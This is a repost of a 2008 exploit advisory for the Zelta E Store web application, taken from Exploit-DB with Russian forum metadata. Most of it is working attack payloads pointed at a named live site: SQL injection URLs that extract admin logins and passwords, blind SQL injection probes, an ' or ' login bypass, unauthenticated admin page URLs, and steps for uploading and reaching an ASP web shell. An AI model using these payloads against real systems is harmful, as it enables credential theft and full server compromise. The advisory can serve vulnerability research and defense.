- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7494
- Проверка EDB
-
- Пройдено
- Автор
- ZORLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2008-12-16
Код:
[~] Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns.
[~]
[~] script: http://www.zeltatrade.com/
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Date: 16/12/2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------
exp for demo: (R-SQL)
user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin
pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin
exp for demo: (B-SQL)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)
http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)
exp for demo: (auth bypass)
http://joineazy.com/members/login.asp
username: [email protected]
pass: ' or '
exp for demo: (admin bypass)
http://joineazy.com/embadmin/admin_main.asp
http://joineazy.com/embadmin/site_setup.asp
http://joineazy.com/embadmin/main_baseimage.asp
exp for demo: (RFU)
firs you register to site
login to site and edit your pictures select your shell.asp
go your shell asp:
http://joineazy.com/members/member_pictures/shell.asp
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
# milw0rm.com [2008-12-16]- Источник
- www.exploit-db.com
